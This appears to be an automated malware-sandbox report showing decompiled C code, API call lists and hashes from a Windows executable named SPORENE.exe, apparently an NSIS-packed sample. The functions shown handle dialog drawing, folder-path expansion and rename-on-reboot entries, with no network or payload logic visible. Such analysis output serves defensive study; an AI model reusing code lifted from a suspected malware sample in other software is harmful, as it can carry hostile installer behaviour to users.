                				_t78 =  &(_t76[1]);
                				_a16 = _t78;
                				_v16 = _t78;
                				_v12 = 0;
                				_v8 = E00404609;
                				if(_t110 != 2) {
                					_v8 = E004045CF;
                				}
                				_push( *((intOrPtr*)(_t117 + 0x34)));
                				_push(0x22);
                				E00404499(_a4);
                				_push( *((intOrPtr*)(_t117 + 0x38)));
                				_push(0x23);
                				E00404499(_a4);
                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                				_t118 = GetDlgItem(_a4, 0x3e8);
                				E004044CE(_t118);
                				SendMessageW(_t118, 0x45b, 1, 0);
                				_t92 =  *( *0x434f10 + 0x68);
                				if(_t92 < 0) {
                					_t92 = GetSysColor( ~_t92);
                				}
                				SendMessageW(_t118, 0x443, 0, _t92);
                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                				 *0x42b234 = 0;
                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                				 *0x42b234 = 0;
                				return 0;
                			}


















                0x0040466a
                0x00404797
                0x004047f4
                0x004047f8
                0x004048c5
                0x004048c7
                0x004048c7
                0x004048cd
                0x004048cd
                0x004048d0
                0x00000000
                0x004048d7
                0x00404806
                0x0040480c
                0x00404816
                0x00404821
                0x00404824
                0x00404827
                0x00404832
                0x00404835
                0x0040483c
                0x00404849
                0x0040485a
                0x00404860
                0x00404868
                0x00404876
                0x0040487c
                0x0040487c
                0x0040483c
                0x00404886
                0x00000000
                0x00404891
                0x00404895
                0x004048a5
                0x004048a5
                0x004048ab
                0x004048b7
                0x004048b7
                0x00000000
                0x004048bb
                0x00404886
                0x004047a2
                0x00000000
                0x004047b4
                0x004047b9
                0x004047bf
                0x00000000
                0x00000000
                0x004047e8
                0x004047ea
                0x004047ef
                0x00000000
                0x004047ef
                0x004047a2
                0x00404670
                0x00404673
                0x00404678
                0x00404689
                0x00404689
                0x00404691
                0x00404694
                0x00404698
                0x0040469b
                0x0040469f
                0x004046a2
                0x004046a5
                0x004046a8
                0x004046af
                0x004046b1
                0x004046b1
                0x004046bb
                0x004046c8
                0x004046d2
                0x004046d7
                0x004046da
                0x004046df
                0x004046f6
                0x004046fd
                0x00404710
                0x00404713
                0x00404727
                0x0040472e
                0x00404733
                0x00404738
                0x00404738
                0x00404746
                0x00404754
                0x00404766
                0x0040476b
                0x0040477b
                0x0040477d
                0x00000000

                APIs
                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                • GetDlgItem.USER32 ref: 0040470A
                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                • GetSysColor.USER32(?), ref: 00404738
                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                • lstrlenW.KERNEL32(?), ref: 00404759
                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                • GetDlgItem.USER32 ref: 004047D4
                • SendMessageW.USER32(00000000), ref: 004047DB
                • GetDlgItem.USER32 ref: 00404806
                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                • SetCursor.USER32(00000000), ref: 0040485A
                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                • SetCursor.USER32(00000000), ref: 00404876
                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$N
                • API String ID: 3103080414-567280382
                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) {
                					_t130 =  *0x434f10;
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {
                						_a12 = _t126 - _v32.top;
                						asm("cdq");
                						asm("cdq");
                						asm("cdq");
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {
                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) {
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                				}
                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                			}













                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectW.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F
                • API String ID: 941294808-1304234792
                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406183(void* __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t12;
                				long _t24;
                				char* _t31;
                				int _t37;
                				void* _t38;
                				intOrPtr* _t39;
                				long _t42;
                				WCHAR* _t44;
                				void* _t46;
                				void* _t48;
                				void* _t49;
                				void* _t52;
                				void* _t53;
                
                				_t38 = __ecx;
                				_t44 =  *(_t52 + 0x14);
                				 *0x430908 = 0x55004e;
                				 *0x43090c = 0x4c;
                				if(_t44 == 0) {
                					L3:
                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                						_t53 = _t52 + 0x10;
                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                						_t48 = _t12;
                						 *(_t53 + 0x18) = _t48;
                						if(_t48 != 0xffffffff) {
                							_t42 = GetFileSize(_t48, 0);
                							_t6 = _t37 + 0xa; // 0xa
                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                								L18:
                								return CloseHandle(_t48);
                							} else {
                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                									if(_t49 == 0) {
                										_t48 =  *(_t53 + 0x18);
                										L16:
                										_t24 = _t42;
                										L17:
                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                										SetFilePointer(_t48, 0, 0, 0);
                										E004060DF(_t48, _t46, _t42 + _t37);
                										GlobalFree(_t46);
                										goto L18;
                									}
                									_t39 = _t46 + _t42;
                									_t31 = _t39 + _t37;
                									while(_t39 > _t49) {
                										 *_t31 =  *_t39;
                										_t31 = _t31 - 1;
                										_t39 = _t39 - 1;
                									}
                									_t24 = _t49 - _t46 + 1;
                									_t48 =  *(_t53 + 0x18);
                									goto L17;
                								}
                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                								_t42 = _t42 + 0xa;
                								goto L16;
                							}
                						}
                					}
                				} else {
                					CloseHandle(E0040602D(_t44, 0, 1));
                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						goto L3;
                					}
                				}
                				return _t12;
                			}



















                0x00406183
                0x0040618c
                0x00406193
                0x0040619d
                0x004061b1
                0x004061d9
                0x004061e4
                0x004061e8
                0x00406208
                0x0040620f
                0x00406219
                0x00406226
                0x0040622b
                0x00406230
                0x00406234
                0x00406243
                0x00406245
                0x00406252
                0x00406256
                0x004062f1
                0x00000000
                0x0040626c
                0x00406279
                0x0040629d
                0x004062a1
                0x004062c0
                0x004062c4
                0x004062c4
                0x004062c6
                0x004062cf
                0x004062da
                0x004062e5
                0x004062eb
                0x00000000
                0x004062eb
                0x004062a3
                0x004062a6
                0x004062b1
                0x004062ad
                0x004062af
                0x004062b0
                0x004062b0
                0x004062b8
                0x004062ba
                0x00000000
                0x004062ba
                0x00406284
                0x0040628a
                0x00000000
                0x0040628a
                0x00406256
                0x00406234
                0x004061b3
                0x004061be
                0x004061c7
                0x004061cb
                0x00000000
                0x00000000
                0x004061cb
                0x004062fc

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                • GetShortPathNameW.KERNEL32 ref: 004061C7
                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                • GetShortPathNameW.KERNEL32 ref: 004061E4
                • wsprintfA.USER32 ref: 00406202
                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                • GlobalFree.KERNEL32 ref: 004062EB
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %ls=%ls$[Rename]
                • API String ID: 2171350718-461813615
                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                				struct _ITEMIDLIST* _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _t44;
                				WCHAR* _t45;
                				signed char _t47;
                				signed int _t48;
                				short _t59;
                				short _t61;
                				short _t63;
                				void* _t71;
                				signed int _t77;
                				signed int _t78;
                				short _t81;
                				short _t82;
                				signed char _t84;
                				signed int _t85;
                				void* _t98;
                				void* _t104;
                				intOrPtr* _t105;
                				void* _t107;
                				WCHAR* _t108;
                				void* _t110;
                
                				_t107 = __esi;
                				_t104 = __edi;
                				_t71 = __ebx;
                				_t44 = _a8;
                				if(_t44 < 0) {
                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                				}
                				_push(_t71);
                				_push(_t107);
                				_push(_t104);
                				_t105 =  *0x434f38 + _t44 * 2;
                				_t45 = 0x432ea0;
                				_t108 = 0x432ea0;
                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                					_t108 = _a4;
                					_a4 = _a4 & 0x00000000;
                				}
                				_t81 =  *_t105;
                				_a8 = _t81;
                				if(_t81 == 0) {
                					L43:
                					 *_t108 =  *_t108 & 0x00000000;
                					if(_a4 == 0) {
                						return _t45;
                					}
                					return E0040653D(_a4, _t45);
                				} else {
                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                						_t98 = 2;
                						_t105 = _t105 + _t98;
                						if(_t81 >= 4) {
                							if(__eflags != 0) {
                								 *_t108 = _t81;
                								_t108 = _t108 + _t98;
                								__eflags = _t108;
                							} else {
                								 *_t108 =  *_t105;
                								_t108 = _t108 + _t98;
                								_t105 = _t105 + _t98;
                							}
                							L42:
                							_t82 =  *_t105;
                							_a8 = _t82;
                							if(_t82 != 0) {
                								_t81 = _a8;
                								continue;
                							}
                							goto L43;
                						}
                						_t84 =  *((intOrPtr*)(_t105 + 1));
                						_t47 =  *_t105;
                						_t48 = _t47 & 0x000000ff;
                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                						_t85 = _t84 & 0x000000ff;
                						_v28 = _t48 | 0x00008000;
                						_t77 = 2;
                						_v16 = _t85;
                						_t105 = _t105 + _t77;
                						_v24 = _t48;
                						_v20 = _t85 | 0x00008000;
                						if(_a8 != _t77) {
                							__eflags = _a8 - 3;
                							if(_a8 != 3) {
                								__eflags = _a8 - 1;
                								if(__eflags == 0) {
                									__eflags = (_t48 | 0xffffffff) - _v12;
                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                								}
                								L38:
                								_t108 =  &(_t108[lstrlenW(_t108)]);
                								_t45 = 0x432ea0;
                								goto L42;
                							}
                							_t78 = _v12;
                							__eflags = _t78 - 0x1d;
                							if(_t78 != 0x1d) {
                								__eflags = (_t78 << 0xb) + 0x436000;
                								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                							} else {
                								E00406484(_t108,  *0x434f08);
                							}
                							__eflags = _t78 + 0xffffffeb - 7;
                							if(__eflags < 0) {
                								L29:
                								E004067C4(_t108);
                							}
                							goto L38;
                						}
                						if( *0x434f84 != 0) {
                							_t77 = 4;
                						}
                						_t121 = _t48;
                						if(_t48 >= 0) {
                							__eflags = _t48 - 0x25;
                							if(_t48 != 0x25) {
                								__eflags = _t48 - 0x24;
                								if(_t48 == 0x24) {
                									GetWindowsDirectoryW(_t108, 0x400);
                									_t77 = 0;
                								}
                								while(1) {
                									__eflags = _t77;
                									if(_t77 == 0) {
                										goto L26;
                									}
                									_t59 =  *0x434f04;
                									_t77 = _t77 - 1;
                									__eflags = _t59;
                									if(_t59 == 0) {
                										L22:
                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                										__eflags = _t61;
                										if(_t61 != 0) {
                											L24:
                											 *_t108 =  *_t108 & 0x00000000;
                											__eflags =  *_t108;
                											continue;
                										}
                										__imp__SHGetPathFromIDListW(_v8, _t108);
                										_a8 = _t61;
                										__imp__CoTaskMemFree(_v8);
                										__eflags = _a8;
                										if(_a8 != 0) {
                											goto L26;
                										}
                										goto L24;
                									}
                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                									__eflags = _t63;
                									if(_t63 == 0) {
                										goto L26;
                									}
                									goto L22;
                								}
                								goto L26;
                							}
                							GetSystemDirectoryW(_t108, 0x400);
                							goto L26;
                						} else {
                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                							if( *_t108 != 0) {
                								L27:
                								if(_v16 == 0x1a) {
                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                								}
                								goto L29;
                							}
                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                							L26:
                							if( *_t108 == 0) {
                								goto L29;
                							}
                							goto L27;
                						}
                					}
                					goto L43;
                				}
                			}





























                0x0040657a
                0x0040657a
                0x0040657a
                0x00406580
                0x00406585
                0x00406596
                0x00406596
                0x0040659e
                0x0040659f
                0x004065a0
                0x004065a1
                0x004065a4
                0x004065ac
                0x004065ae
                0x004065bf
                0x004065c2
                0x004065c2
                0x004065c6
                0x004065cc
                0x004065cf
                0x004067aa
                0x004067aa
                0x004067b5
                0x004067c1
                0x004067c1
                0x00000000
                0x004065d5
                0x004065da
                0x004065ef
                0x004065f0
                0x004065f6
                0x00406788
                0x00406796
                0x00406799
                0x00406799
                0x0040678a
                0x0040678d
                0x00406790
                0x00406792
                0x00406792
                0x0040679b
                0x0040679b
                0x004067a1
                0x004067a4
                0x004065d7
                0x00000000
                0x004065d7
                0x00000000
                0x004067a4
                0x004065fc
                0x004065ff
                0x0040660e
                0x00406615
                0x00406621
                0x00406624
                0x00406627
                0x00406628
                0x0040662d
                0x00406633
                0x00406636
                0x00406639
                0x0040672c
                0x00406731
                0x00406764
                0x00406769
                0x0040676e
                0x00406773
                0x00406773
                0x00406778
                0x0040677e
                0x00406781
                0x00000000
                0x00406781
                0x00406733
                0x00406736
                0x00406739
                0x0040674e
                0x00406755
                0x0040673b
                0x00406742
                0x00406742
                0x0040675d
                0x00406760
                0x00406724
                0x00406725
                0x00406725
                0x00000000
                0x00406760
                0x00406646
                0x0040664a
                0x0040664a
                0x0040664b
                0x0040664d
                0x0040668a
                0x0040668d
                0x0040669d
                0x004066a0
                0x004066a8
                0x004066ae
                0x004066ae
                0x00406709
                0x00406709
                0x0040670b
                0x00000000
                0x00000000
                0x004066b2
                0x004066b7
                0x004066b8
                0x004066ba
                0x004066d1
                0x004066df
                0x004066e5
                0x004066e7
                0x00406705
                0x00406705
                0x00406705
                0x00000000
                0x00406705
                0x004066ed
                0x004066f6
                0x004066f9
                0x004066ff
                0x00406703
                0x00000000
                0x00000000
                0x00000000
                0x00406703
                0x004066cb
                0x004066cd
                0x004066cf
                0x00000000
                0x00000000
                0x00000000
                0x004066cf
                0x00000000
                0x00406709
                0x00406695
                0x00000000
                0x0040664f
                0x0040666d
                0x00406676
                0x00406713
                0x00406717
                0x0040671f
                0x0040671f
                0x00000000
                0x00406717
                0x00406680
                0x0040670d
                0x00406711
                0x00000000
                0x00000000
                0x00000000
                0x00406711
                0x0040664d
                0x00000000
                0x004065da

                APIs
                • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400), ref: 00406695
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,747DEA30), ref: 004066A8
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-2439783390
                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t39;
                				long _t41;
                				void* _t44;
                				signed char _t50;
                				long* _t54;
                
                				if(_a4 + 0xfffffecd > 5) {
                					L18:
                					return 0;
                				}
                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                					goto L18;
                				} else {
                					_t50 = _t54[5];
                					if((_t50 & 0xffffffe0) != 0) {
                						goto L18;
                					}
                					_t39 =  *_t54;
                					if((_t50 & 0x00000002) != 0) {
                						_t39 = GetSysColor(_t39);
                					}
                					if((_t54[5] & 0x00000001) != 0) {
                						SetTextColor(_a8, _t39);
                					}
                					SetBkMode(_a8, _t54[4]);
                					_t41 = _t54[1];
                					_v16.lbColor = _t41;
                					if((_t54[5] & 0x00000008) != 0) {
                						_t41 = GetSysColor(_t41);
                						_v16.lbColor = _t41;
                					}
                					if((_t54[5] & 0x00000004) != 0) {
                						SetBkColor(_a8, _t41);
                					}
                					if((_t54[5] & 0x00000010) != 0) {
                						_v16.lbStyle = _t54[2];
                						_t44 = _t54[3];
                						if(_t44 != 0) {
                							DeleteObject(_t44);
                						}
                						_t54[3] = CreateBrushIndirect( &_v16);
                					}
                					return _t54[3];
                				}
                			}









                0x00404512
                0x004045c8
                0x00000000
                0x004045c8
                0x00404523
                0x00404527
                0x00000000
                0x00404541
                0x00404541
                0x0040454a
                0x00000000
                0x00000000
                0x0040454c
                0x00404558
                0x0040455b
                0x0040455b
                0x00404561
                0x00404567
                0x00404567
                0x00404573
                0x00404579
                0x00404580
                0x00404583
                0x00404586
                0x00404588
                0x00404588
                0x00404590
                0x00404596
                0x00404596
                0x004045a0
                0x004045a5
                0x004045a8
                0x004045ad
                0x004045b0
                0x004045b0
                0x004045c0
                0x004045c0
                0x00000000
                0x004045c3

                APIs
                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                • GetSysColor.USER32(00000000), ref: 0040455B
                • SetTextColor.GDI32(?,00000000), ref: 00404567
                • SetBkMode.GDI32(?,?), ref: 00404573
                • GetSysColor.USER32(?), ref: 00404586
                • SetBkColor.GDI32(?,?), ref: 00404596
                • DeleteObject.GDI32(?), ref: 004045B0
                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
